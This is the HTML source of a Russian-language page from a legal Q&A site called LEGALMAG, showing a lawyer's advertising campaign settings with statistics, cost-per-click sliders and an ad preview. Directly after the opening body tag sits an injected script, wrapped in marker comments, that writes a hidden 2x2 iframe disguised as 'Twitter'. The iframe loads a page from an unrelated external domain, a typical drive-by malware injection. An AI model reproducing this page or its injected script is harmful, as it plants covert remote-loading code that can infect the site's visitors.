<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>
<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li class="active"><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-profile">
					<div id="userIn">
						<div class="img"><img src="design/images/faceHuge.jpg" alt=""></div>
						<p>Иванова Снежанна</p>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="profile">
						<div class="profile">
							<ul>
								<li><a href="">Редактировать профиль</a>
									<ul>
										<li><a href="">Личная информация</a></li>
										<li><a href="">Образование и работа</a></li>
										<li><a href="">Контатная информация</a></li>
										<li><a href="">Услуги</a></li>
										<li><a href="">Настройка оповещений</a></li>
										<li class="active">Рекламная компания</li>
									</ul>
								</li>
								<li class="back"><a href="">Назад</a></li>
							</ul>
						</div>
						<div class="leftSay"></div>
					</div>
				</aside>
				<section id="right-profile">
					<div class="wrapper">
						<div class="head">Редактировать профиль</div>
						<div class="personalInfo wide">
							<section id="adCampage">
								<ul>
									<li><a href="#campageStatistic">Статистика</a></li>
									<li><a href="#campageShows">Настройка показов</a></li>
									<li><a href="#campageAdstype">Виды объявлений</a></li>
								</ul>
								<div id="campageStatistic">
									<div class="titles">
										<div class="left">Текущий баланс:</div>
										<div class="right"><span class="price">100 рублей</span>&emsp;<a href="">(пополнить)</a></div>
										<div class="clear">&nbsp;</div>
									</div>
									<div class="content">
										<div id="statistic">
											<form>
												<p>Статистика за период:</p>
												<span>с</span>
												<input type="text" name="date-from" class="datepicker">
												<span>по</span>
												<input type="text" name="date-to" class="datepicker">
												<div class="buttonNext"><input type="submit" class="buttonClear" value="Показать"></div>
												<ul>
													<li><a href="">сегодня</a></li>
													<li><a href="">вчера</a></li>
													<li><a href="">7 дней</a></li>
													<li><a href="">30 дней</a></li>
													<li><a href="">90 дней</a></li>
													<li><a href="">365 дней</a></li>
												</ul>
												<div class="clear">&nbsp;</div>
											</form>
										</div>
									</div>
									<div class="titles2">Статистика рекламной компании</div>
									<dl>
										<dt>Показов объявлений:</dt>
										<dd>55</dd>
										<dt>Переходов по объявлению:</dt>
										<dd>100</dd>
										<dt>Сообщениий пользователей:</dt>
										<dd>50</dd>
										<dt>Расход по рекламной компании:</dt>
										<dd><span>155 руб.</span></dd>
									</dl>
									<div class="clear">&nbsp;</div>
								</div>
								<div id="campageShows">
									<form>
										<div class="titles">
											<div class="left">Статус рекламной кампании:</div>
											<div class="right">
												<span class="startCampage">Запущена</span>
												<a href="" class="stopCampage">Остановить</a>
											</div>
											<div class="clear">&nbsp;</div>
										</div>
										<div class="adsBlock">
											<table>
												<tr>
													<th>Размещение объявлений</th>
													<th>Стоимость (количество рублей за клик)</th>
												</tr>
												<tr >
													<th colspan="2" class="adsHead">
														<input type="checkbox" name="" id="adsQuestion"><label for="adsQuestion">Раздел «лента вопросов»</label>
													</th>
												</tr>
												<tr>
													<td>
														<input type="checkbox" name="" id="adsRightBlock"><label for="adsRightBlock">Правый блок (просмотр)</label>
													</td>
													<td>
														<div class="slider3"></div>
														<input type="text" class="amount3" maxlength="5">
														<span class="red">Минимальные шансы для показа. Увеличьте цену</span>
														<div class="clear">&nbsp;</div>
													</td>
												</tr>
												<tr>
													<td>
														<input type="checkbox" name="" id="adsQuestionBlock"><label for="adsQuestionBlock">На странице вопроса (просмотр)</label>
													</td>
													<td>
														<div class="slider4"></div>
														<input type="text" class="amount4" maxlength="5">
														<span class="grey">Чем выше цена, тем ниже конкуренция</span>
														<div class="clear">&nbsp;</div>
													</td>
												</tr>
												<tr>
													<td>
														<input type="checkbox" name="" id="adsPublishBlock"><label for="adsPublishBlock">На страницах публикации вопроса (просмотр)</label>
													</td>
													<td>
														<div class="slider5"></div>
														<input type="text" class="amount5" maxlength="5">
														<span class="green">Минимум конкурентов</span>
														<div class="clear">&nbsp;</div>
													</td>
												</tr>
											</table>
											<table class="bottom">
												<tr>
													<th colspan="2" class="adsHead">
														<input type="checkbox" name="" id="adsQuestion"><label for="adsQuestion">Раздел «лента вопросов»</label>
													</th>
												</tr>
												<tr>
													<td>
														<input type="checkbox" name="" id="adsRightBlock"><label for="adsRightBlock">Правый блок (просмотр)</label>
													</td>
													<td>
														<div class="slider3"></div>
														<input type="text" class="amount3" maxlength="5">
														<span class="red">Минимальные шансы для показа. Увеличьте цену</span>
														<div class="clear">&nbsp;</div>
													</td>
												</tr>
												<tr>
													<td>
														<input type="checkbox" name="" id="adsQuestionBlock" disabled><label for="adsQuestionBlock">На странице вопроса (просмотр)</label>
													</td>
													<td>
														<div class="sliderDisabled"></div>
													</td>
												</tr>
												<tr>
													<td>
														<input type="checkbox" name="" id="adsPublishBlock"><label for="adsPublishBlock">На страницах публикации вопроса (просмотр)</label>
													</td>
													<td>
														<div class="slider5"></div>
														<input type="text" class="amount5" maxlength="5">
														<span class="green">Минимум конкурентов</span>
														<div class="clear">&nbsp;</div>
													</td>
												</tr>
											</table>
											<div class="clear">&nbsp;</div>
										</div>
										<div class="buttonHolder11"><input type="submit" class="buttonSave" value="Сохранить"></div>
									</form>
								</div>
								<div id="campageAdstype">
									<form>
										<div class="left">
											<input type="checkbox" name="" id="useMyPhoto"><label for="useMyPhoto">Использовать мое фото профиля</label>
											<div class="adText">
												<label for="adText">Текст объявления:</label><textarea id="adText">Специалист по гражданскому и семейному праву</textarea>
											</div>
										</div>
										<div class="right">
											<p>Так будет выглядеть ваше объявление</p>
											<dl>
												<dt><img src="design/images/offers.jpg" alt=""></dt>
												<dd class="name">Иванов Иван Сергеевич</dd>
												<dd class="spec">Специалист по гражданскому и семейному праву</dd>
												<dd><input type="submit" class="button-fox" value="Написать" disabled></dd>
											</dl>
										</div>
										<div class="clear">&nbsp;</div>
										<div class="buttonHolder11"><input type="submit" class="buttonSave" value="Сохранить"></div>
									</form>
								</div>
							</section>
						</div>
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>